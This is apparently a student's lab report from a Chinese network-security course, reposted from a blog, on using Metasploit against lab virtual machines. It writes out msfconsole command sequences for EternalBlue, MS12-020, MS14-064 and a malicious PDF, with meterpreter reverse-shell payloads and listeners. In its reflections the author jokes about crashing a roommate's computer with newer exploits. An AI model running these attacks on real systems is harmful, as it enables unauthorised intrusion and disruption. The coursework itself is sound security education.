2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用
實(shí)踐內(nèi)容(3.5分)
本實(shí)踐目標(biāo)是掌握metasploit的基本應(yīng)用方式,重點(diǎn)常用的三種攻擊方式的思路。具體需要完成:
1.1一個(gè)主動(dòng)攻擊實(shí)踐(1分)
- ms08_067; (失敗)
- MS17-010永恒之藍(lán)(成功)
- MS12-20(比永恒之藍(lán)更藍(lán)的藍(lán)屏)(本來以為唯一后來不唯一了)
1.2 一個(gè)針對(duì)瀏覽器的攻擊(1分)
- ms14_064(成功)
1.3 一個(gè)針對(duì)客戶端的攻擊(1分)
- Adobe(成功)
1.4 成功應(yīng)用任何一個(gè)輔助模塊。(0.5分)
- 掃描查看靶機(jī)開放端口(唯一)
以上四個(gè)小實(shí)踐可不限于以上示例,并要求至少有一個(gè)是和其他所有同學(xué)不一樣的,否則扣除0.5分。
實(shí)驗(yàn)過程
基礎(chǔ)問題回答
(1)用自己的話解釋什么是exploit,payload,encode.
任務(wù)一:一個(gè)主動(dòng)攻擊實(shí)踐
漏洞MS08_067
關(guān)于漏洞MS08_067的原理
msfconsole進(jìn)入msf控制臺(tái)
search ms08_067查看該漏洞
use exploit/windows/smb/ms08_067_netapi使用該漏洞
show payloads回鏈攻擊載荷
關(guān)閉防火墻,改變安全策略,查看445端口狀況,甚至改變winxp版本,由中文版改成英文版
很遺憾始終是只能檢測(cè)出系統(tǒng)卻無法生成有效的會(huì)話
ms17_010永恒之藍(lán)
攻擊方:kali 192.168.70.131
靶機(jī):win7 192.168.70.130
輸入msfconsole指令,打開控制臺(tái);
依次輸入以下指令進(jìn)行設(shè)置與攻擊:
set payload windows/x64/meterpreter/reverse_tcp //選擇攻擊載荷set LHOST 192.168.70.131 //設(shè)置攻擊方ipset RHOST 192.168.70.130 //設(shè)置靶機(jī)ipexploit
連接成功
嘗試命令查看靶機(jī)ip
MS12-20
攻擊機(jī)kali 192.168.70.131
靶機(jī)windows 7 192.168.70.130
用kali自帶的的掃描工具nmap 查看靶機(jī)是否開啟3389端口。(沒開就把他打開!)
掃描之后發(fā)現(xiàn)3389是開放的,然后啟動(dòng)msfconsole, 利用里面的模塊查看是否存在Ms12-020漏洞。
查詢模塊
然后exploit
100%表示可以攻擊
攻擊模塊
然后還是exploit
出現(xiàn)seems down說明靶機(jī)已經(jīng)藍(lán)上了!
一個(gè)針對(duì)瀏覽器的攻擊
ms14_064
主機(jī) kali 192.168.70.131
靶機(jī) Windows XP SP3 192.168.70.141
然后exploit開啟監(jiān)聽,然后生成網(wǎng)址,將這個(gè)網(wǎng)址在靶機(jī)打開后攻擊機(jī)就捕獲了靶機(jī),建立會(huì)話
一個(gè)針對(duì)客戶端的攻擊
Adobe
攻擊方:kali 192.168.70.131
靶機(jī):winxp 192.168.70.141
輸入msfconsole指令,打開控制臺(tái);
依次輸入以下指令進(jìn)行設(shè)置
set payload windows/meterpreter/reverse_tcp //設(shè)置tcp反向連接 set LHOST 192.168.70.131//攻擊方IP set LPORT 5231 //攻擊方攻擊端口 set FILENAME wyhy_exp5.pdf在終端中,將生成的文件按照文件路徑復(fù)制出來,并復(fù)制到靶機(jī)中
在kali中重新打開,并輸入以下指令進(jìn)行監(jiān)聽: use exploit/multi/handler //進(jìn)入監(jiān)聽模塊 set payload windows/meterpreter/reverse_tcp //設(shè)置tcp反向連接 set LHOST 192.168.70.131 //攻擊方IP set LPORT 5231 //攻擊方攻擊端口 exploit //監(jiān)聽
輔助模塊
查看靶機(jī)端口
使用auxiliary/scanner/portscan/tcp模塊,用來掃描靶機(jī)的TCP端口使用情況;
執(zhí)行命令use auxiliary/scanner/portscan/tcp進(jìn)入并使用模塊;
show options查看需要設(shè)置的參數(shù)信息,設(shè)置靶機(jī)的ip為RHOST
然后expolit
基礎(chǔ)問題回答
- 用自己的話解釋什么是exploit,payload,encode.
exploit:英文翻譯為利用,黑客就是利用漏洞對(duì)電腦進(jìn)行攻擊,有漏洞不一定可以利用,但可以利用的一定有漏洞。
payload:有效載荷。通常在傳輸數(shù)據(jù)時(shí),為了使數(shù)據(jù)傳輸更可靠,要把原始數(shù)據(jù)分批傳輸,并且在每一批數(shù)據(jù)的頭和尾都加上一定的輔助信息,而其中的原始數(shù)據(jù)就是payload
encode:編碼器,用來給payload進(jìn)行編碼,保護(hù)payload不被發(fā)現(xiàn)
離實(shí)戰(zhàn)還缺些什么技術(shù)或步驟?
實(shí)戰(zhàn)?首先我們只能在自己的局域網(wǎng)內(nèi)實(shí)現(xiàn)。對(duì)于外網(wǎng),不在同一子網(wǎng)下的地址鎖定無法實(shí)現(xiàn)就無法實(shí)戰(zhàn)攻擊,我覺得這是目前最大缺憾。
實(shí)驗(yàn)感想
這次我最喜歡的就是那個(gè)藍(lán)屏漏洞,在CSDN上逛到的以為我是獨(dú)一無二結(jié)果……不過還是覺得那個(gè)很好玩,起初想做這個(gè)是想搞一下正在打Apex的室友讓他感受一下快要吃雞藍(lán)個(gè)屏,但是系統(tǒng)版本高了沒啥用。后續(xù)我會(huì)繼續(xù)利用更新的漏洞讓室友感受吃不到雞的樂趣o( ̄▽ ̄)o
轉(zhuǎn)載于:https://www.cnblogs.com/Yhooyon/p/10732656.html
總結(jié)
以上是生活随笔為你收集整理的2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: YAML简介和简单说明
- 下一篇: sudo的用法